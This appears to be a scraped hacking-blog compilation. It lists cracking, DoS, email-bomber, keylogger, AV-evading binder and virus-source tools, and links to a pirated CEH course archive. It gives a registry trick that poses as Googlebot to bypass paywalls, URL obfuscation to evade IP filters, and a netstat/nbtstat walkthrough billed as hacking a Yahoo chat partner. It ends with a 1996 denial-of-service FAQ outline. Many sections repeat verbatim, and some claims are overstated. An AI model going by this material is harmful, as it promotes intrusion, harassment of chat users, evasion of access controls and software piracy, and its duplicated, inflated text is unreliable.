31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.
Disassembler
1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassembe Windows executables and dynamic link libraries.
DoS tool
1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.
Document
1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Aticles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.
E-mail tool
1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer \ mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.
Editor
1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.
Encryption & decryption tool
1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge munber of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email form unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.
Executable file tool
1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.
ICQ tool
1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.
Keylogger
1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.
MISC
1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.
Packet forging
1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.
Phreak tool
1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.
Scanner
1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER deamons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collet 20 tools to use in port sacanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.
Sniffer
1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.
Snoop tool
1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.
Source code
1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.
Spoof
1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.
Virus
1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.
Backdoor
extract the file and rename it to ISO
CODE
Code:
http://rapidshare.de/files/34835184/CEH.part01.rar
http://rapidshare.de/files/34835226/CEH.part02.rar
http://rapidshare.de/files/34835342/CEH.part03.rar
http://rapidshare.de/files/34835424/CEH.part04.rar
http://rapidshare.de/files/34835214/CEH.part05.rar
http://rapidshare.de/files/34835413/CEH.part06.rar
http://rapidshare.de/files/34835235/CEH.part07.rar
http://rapidshare.de/files/34835124/CEH.part08.rar
Secret Backdoor To Many Websites
Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.
Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
The lesson you should have learned here is: Obviously Google can go where you can't.
Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
CODE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Using URL Obfuscation to hide your IP Address
et me elaborate on how hackers use URL Obfuscation in order to hide their IP Address.
It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don’t. Here is an example of an encoded binary IP address: http://8812120797/. Does it look confusing? Hehe Well, this decimal address can be converted into a human readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.
To convert an IP address to its binary equivalent, perform the following steps.
(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.
192 = 11000000
168 = 10101000
13 = 00001101
10 = 00001010
(2) Combine the four eight digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.
(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.
(4) Entering this into the address field, http://3232238858, takes you to 192.168.12.10.
It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don’t. Here is an example of an encoded binary IP address: http://8812120797/. Does it look confusing? Hehe Well, this decimal address can be converted into a human readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.
To convert an IP address to its binary equivalent, perform the following steps.
(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.
192 = 11000000
168 = 10101000
13 = 00001101
10 = 00001010
(2) Combine the four eight digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.
(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.
(4) Entering this into the address field, http://3232238858, takes you to 192.168.12.10.
Find who is Invisible on Yahoo messenger
Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .
2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed),So you know that the user is online.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .
2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed),So you know that the user is online.
Hack a Yahoo Account While Chatting
This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
_________________________________________________________________________________________
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
_________________________________________________________________________________________
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
Saturday, July 12, 2008
how to search google for RAPIDSHARE links
If you wanna find some apps, files etc on rapidshare.de via google, do the following.
Paste this into the google search window (not the adress bar):
site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412
* this searches the site rapidshare.de for any file that is rar or zip, and
has been indexed between 1-11 February.
dvd site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412
* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any app posted with the word dvd in it will be found.
There are mainly three criteria to keep in mind when doing this search.
1. site: your site of choice to search
2. filetype: filetypes you wanna search,if you put a "OR" after the first
filetype you can add more.
3. daterange: (start date-enddate)
* this uses the "julian calendar", converter can be found here:
Code:
http://aa.usno.navy.mil/data/docs/JulianDate.html
Paste this into the google search window (not the adress bar):
site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412
* this searches the site rapidshare.de for any file that is rar or zip, and
has been indexed between 1-11 February.
dvd site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412
* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any app posted with the word dvd in it will be found.
There are mainly three criteria to keep in mind when doing this search.
1. site: your site of choice to search
2. filetype: filetypes you wanna search,if you put a "OR" after the first
filetype you can add more.
3. daterange: (start date-enddate)
* this uses the "julian calendar", converter can be found here:
Code:
http://aa.usno.navy.mil/data/docs/JulianDate.html
Hans Husman
t95hhu@student.tdb.uu.se
Last updated: Mon Oct 28 14:56:31 MET 1996
.0. FOREWORD
.A. INTRODUCTION
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD
.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP
.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
